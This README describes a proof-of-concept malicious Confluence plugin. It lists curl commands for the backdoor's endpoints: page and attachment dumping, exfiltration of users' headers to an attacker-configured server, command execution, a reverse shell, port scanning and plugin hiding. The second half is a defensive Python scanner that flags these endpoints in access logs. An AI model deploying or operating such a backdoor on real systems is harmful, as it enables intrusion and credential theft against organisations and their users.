A PoC for a malicious Confluence plugin. Read more about this on our blog.
The general code may also work with slight adjustments in Jira but the plugin cannot be directly installed into Jira.
```bash
curl "http://yourserver/rest/maintenance/latest/listattachments?accesskey=<Access Key>"
curl "http://yourserver/rest/maintenance/latest/getattachment?accesskey=<Access Key>&id=<Attachment ID>" -O
curl "http://yourserver/rest/maintenance/latest/listpages?accesskey=<Access Key>"
curl "http://yourserver/rest/maintenance/latest/getpage?accesskey=<Access Key>&id=<Page ID>"
```
Since the cookies have HttpOnly set, header exfiltration works by first sending a request to the custom endpoint /getheaders, which returns all headers base64 encoded into the DOM. Those are then sent to the attacker.
```bash
# Configure the server which will receive POST requests of users containing base64 encoded headers
curl "http://yourserver/rest/maintenance/latest/headerexfilconfig?accesskey=<Access Key>&url=<base64 encoded target URL>&enabled={TRUE,FALSE}"
python3 headerserver.py
python3 credsserver.py
```
```bash
curl "http://yourserver/rest/maintenance/latest/proxy?accesskey=<Access Key>&method={GET,POST}&url=<base64 encoded URL>&headers=<base64 encoded headers (name1:value1,nameN:valueN)>&body=<base64 encoded body for POST>"
curl "http://yourserver/rest/maintenance/latest/exec?accesskey=<Access Key>&cmd=<Command to run>&args=<arg1,arg2,arg3>"
curl "http://yourserver/rest/maintenance/latest/revshell?accesskey=<Access Key>&rhost=<Remote Host>&rport=<Remote Port>"
curl "http://yourserver/rest/maintenance/latest/portscan?accesskey=<Access Key>&ip=<IP address>"
curl "http://yourserver/rest/maintenance/latest/hideplugins?accesskey=<Access Key>&plugins=<com.plugin.hideme,com.plugin.hidemeto>&enabled={TRUE,FALSE}"
```
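From the defender's side, the endpoint names listed above are a usable access-log signature. The following is an added example and not part of the PoC repository: it scans Confluence/Tomcat access-log lines in combined format for requests to the documented `/rest/maintenance/latest/` endpoints, assuming the default path shown in this README (a modified build could rename it) and using constructed sample log lines.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoints exposed by the PoC plugin as documented in this README.
SUSPICIOUS_ENDPOINTS = {
    "listattachments", "getattachment", "listpages", "getpage",
    "getheaders", "headerexfilconfig", "proxy", "exec", "revshell",
    "portscan", "hideplugins",
}
# Documented default base path (assumption: a modified build could rename it).
PLUGIN_BASE = "/rest/maintenance/latest/"

# Tomcat "combined" access log: client, timestamp, request line, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def scan_line(line):
    """Return a finding dict if the request hits a plugin endpoint, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    idx = parts.path.find(PLUGIN_BASE)  # find(), not startswith(): tolerate a context path
    if idx < 0:
        return None
    endpoint = parts.path[idx + len(PLUGIN_BASE):].split("/", 1)[0]
    if endpoint not in SUSPICIOUS_ENDPOINTS:
        return None
    params = parse_qs(parts.query)
    return {
        "ip": m.group("ip"), "time": m.group("ts"), "endpoint": endpoint,
        "status": int(m.group("status")),
        # operator calls carry accesskey; /getheaders is fetched by victims' browsers without it
        "has_accesskey": "accesskey" in params,
        "params": sorted(params),  # names only; values are base64 blobs or secrets
    }

def scan_log(lines):
    return [f for f in (scan_line(l) for l in lines) if f]

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /wiki/display/DEV/Home HTTP/1.1" 200 5123
203.0.113.7 - - [12/Mar/2024:10:02:11 +0000] "GET /rest/maintenance/latest/listpages?accesskey=REDACTED HTTP/1.1" 200 812
203.0.113.7 - - [12/Mar/2024:10:02:40 +0000] "GET /confluence/rest/maintenance/latest/exec?accesskey=REDACTED&cmd=id HTTP/1.1" 200 77
10.0.0.9 - - [12/Mar/2024:10:03:00 +0000] "GET /rest/maintenance/latest/getheaders HTTP/1.1" 200 2048
""".splitlines()

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Hits on `exec`, `revshell`, `proxy` or `hideplugins` carrying an `accesskey` parameter warrant immediate triage, while `getheaders` requests from many internal clients without one indicate the header-exfiltration script is being served to users.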